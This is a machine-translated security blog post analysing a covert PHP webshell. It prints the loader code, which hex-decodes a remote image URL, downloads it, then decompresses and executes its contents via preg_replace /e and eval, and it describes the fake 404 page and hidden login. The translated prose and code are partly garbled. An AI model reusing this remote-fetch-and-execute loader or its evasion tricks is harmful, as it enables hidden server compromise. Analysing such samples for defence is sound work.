PHP Backdoor New gameplay: a wretched PHP backdoor analysis

Recently, 360 Web site defender Security team recently captured a PHP-based implementation of the Webshell sample, its clever code dynamic generation way, wretched self-page camouflage technique, let us in the process of analyzing this sample to feel a lot of fun. Next, let's share the wonderful Webshell.

The Webshell code is as follows:

<?php
error_reporting (0);
Session_Start ();
Header ("Content-type:text/html;charset=utf-8″"), if (Empty ($_session[' API '))
$_session[' API ']=substr (file_get_contents (
sprintf ('%s?%s ', pack ("h*",
' 687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′), Uniqid ()), 3649);
@preg_replace ("~ (. *) ~ies", Gzuncompress ($_session[' API '), NULL);
?>

The key to look at the following line of code,

sprintf ('%s?%s ', pack ("h*",
' 687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′), uniqid ())

After executing here is actually a picture, the decrypted picture address is as follows:

Http://7shell.googlecode.com/svn/make.jpg?53280b00f1e85

Then call the File_get_contents function to read the picture as a string, and then substr take 3649 bytes after the content, then call Gzuncompress decompression, get the real code. Finally, the Preg_replace modifier e is called to execute the malicious code. The following statement is executed here to restore the malicious sample code.

<?php
Echo gzuncompress (substr (file_get_contents (sprintf ('%s?%s ', pack ("h*",
(687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′), Uniqid ())), 3649));
?>

：

Analysis of this code, found that this is a disguised 404 Trojan (here is really too wretched ...) Change the page title to 404 Not Found), in fact, the entire Webshell a class plus three function, such as:

First I first look at its front-end HTML code, which has such a section of JS program
Document.onkeydown = function (e) {
var theevent = window.event | | E
var code = Theevent.keycode | | Theevent.which;
if (= = = Code) {
$ ("login"). Style.display = "Block"
}
}
Here it uses Document.onkeydown to get the user to hit the keyboard event, when code equals 80 display Login This div, here Query the KeyCode table, find 80 corresponding p and p key

So trigger Webshell landing need to press the P key (do not press the P key page is a blank page, do not see the login box):

Back to the server PHP code, you can see the program is symmetric encryption, and the login password as the encryption key, code:

And look at the logic of Init ().

, look at this code first

$true =

@gzuncompress (Gzuncompress (Crypt::d ecrypt (Pack (' h* ', ' 789c63ac0bbec7b494f12cdb02f6dfac3f833731cf093e163a892990793ebf0a9f1c6b18bb68983b3b47a022002a840c59′), $_POST[' Key '], true));

According to this decryption logic we can launch, here is actually the string true to do the following encryption processing,

Unpack (' h* ', Crypt::encrypt (gzcompress (' true '), gzcompress ' key '), true))

So when the correct password is entered, @gzuncompress returns the string true, and then the program calls Setcookie to return the $_cookie[' key ' to the client, and then it is worth mentioning that this exit (' {' Status ': ' On '} '), Here it is very close to the front-end code, we look at the front end has a callback function, as follows

function callback () {
var json = eval ("(" + This.responsetext + ")");
if (json.status== ' on ') {
Window.location.reload ();
Return
}
if (Json.notice) {
$ ("notice"). Style.display = "block";
$ ("notice"). InnerHTML = Json.notice;
Sideout ();
}
}

The execution of exit (' {' "Status ': ' On '} ') returns the JSON string {" status ":" On "}, at which point the front-end JS Code classback () gets to this response performs window.location.reload () refresh, Ask again to bring the cookie that was previously obtained, and then execute the logic that determines the cookie:

This is the same as the logic of the previous post, the following when the judgment is ' true ', here again request a picture, pack out address is http://2012heike.googlecode.com/svn/trunk/code.jpg, and then call _ Request to get the picture content, decryption decompression and then eval, after analysis found that code.jpg is the real Webshell after the encryption compressed content. Here I followed the code to print out the content of the really executed Webshell:

After the successful landing Webshell such as:

Summarize:

This is a highly covert webshell, which does not use some dangerous functions and sensitive words in its code, but instead saves the real shell content after layers of encryption to the image, leaving only a URL on the server, and the URL is encrypted. So there is no external view of any features can be found, over the majority of the WAF and kill the soft Avira. The author's use of new ideas, and the front end of the combination of close, code simplification, a variety of artifice, different from the common Webshell back door, it is admirable!

PHP Backdoor New gameplay: a wretched PHP backdoor analysis